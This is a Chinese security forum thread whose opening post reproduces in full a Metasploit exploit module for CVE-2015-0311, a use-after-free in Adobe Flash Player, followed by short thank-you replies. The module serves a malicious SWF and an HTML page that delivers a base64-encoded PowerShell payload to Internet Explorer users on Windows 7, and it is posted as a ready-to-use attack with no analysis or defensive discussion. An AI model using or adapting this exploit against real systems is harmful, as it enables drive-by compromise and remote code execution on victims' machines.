查看: 30265|回复: 26

Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2015-3-13 15:20:46 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    ##
    # This module requires Metasploit: [url]http://metasploit.com/download[/url]
    # Current source: [url]https://github.com/rapid7/metasploit-framework[/url]
    ##
     
    require 'msf/core'
     
    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking
     
      include Msf::Exploit::Powershell
      include Msf::Exploit::Remote::BrowserExploitServer
     
      def initialize(info={})
        super(update_info(info,
          'Name'                => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free',
          'Description'         => %q{
            This module exploits an use after free vulnerability in Adobe Flash Player. The
            vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying
            to uncompress() a malformed byte stream. This module has been tested successfully
            on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and
            16.0.0.235.
          },
          'License'             => MSF_LICENSE,
          'Author'              =>
            [
              'Unknown', # Vulnerability discovery and exploit in the wild
              'hdarwin', # Public exploit by @hdarwin89
              'juan vazquez' # msf module
            ],
          'References'          =>
            [
              ['CVE', '2015-0311'],
              ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'],
              ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'],
              ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/']
            ],
          'Payload'             =>
            {
              'DisableNops' => true
            },
          'Platform'            => 'win',
          'BrowserRequirements' =>
            {
              :source  => /script|headers/i,
              :os_name => OperatingSystems::Match::WINDOWS_7,
              :ua_name => Msf::HttpClients::IE,
              :flash   => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' },
              :arch    => ARCH_X86
            },
          'Targets'             =>
            [
              [ 'Automatic', {} ]
            ],
          'Privileged'          => false,
          'DisclosureDate'      => 'Apr 28 2014',
          'DefaultTarget'       => 0))
      end
     
      def exploit
        @swf = create_swf
        super
      end
     
      def on_request_exploit(cli, request, target_info)
        print_status("Request: #{request.uri}")
     
        if request.uri =~ /\.swf$/
          print_status('Sending SWF...')
          send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
          return
        end
     
        print_status('Sending HTML...')
        send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
      end
     
      def exploit_template(cli, target_info)
        swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
        target_payload = get_payload(cli, target_info)
        psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
        b64_payload = Rex::Text.encode_base64(psh_payload)
     
        html_template = %Q|<html>
        <body>
        <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
        <param name="movie" value="<%=swf_random%>" />
        <param name="allowScriptAccess" value="always" />
        <param name="FlashVars" value="sh=<%=b64_payload%>" />
        <param name="Play" value="true" />
        <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/>
        </object>
        </body>
        </html>
        |
     
        return html_template, binding()
      end
     
      def create_swf
        path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf')
        swf =  ::File.open(path, 'rb') { |f| swf = f.read }
     
        swf
      end
     
    end
    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-6-27 22:15:51 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 06:46:36 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-28 18:17:19 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-6-30 09:47:18 | 显示全部楼层
    学习学习技术,加油!
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-4-14 17:44
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-7-1 00:54:38 | 显示全部楼层
    感谢楼主的分享~
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 07:18:50 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-1 10:12:25 | 显示全部楼层
    支持,看起来不错呢!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 07:55:30 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2015-7-2 10:18:46 | 显示全部楼层
    还是不错的哦,顶了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 16:00 , Processed in 0.031221 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部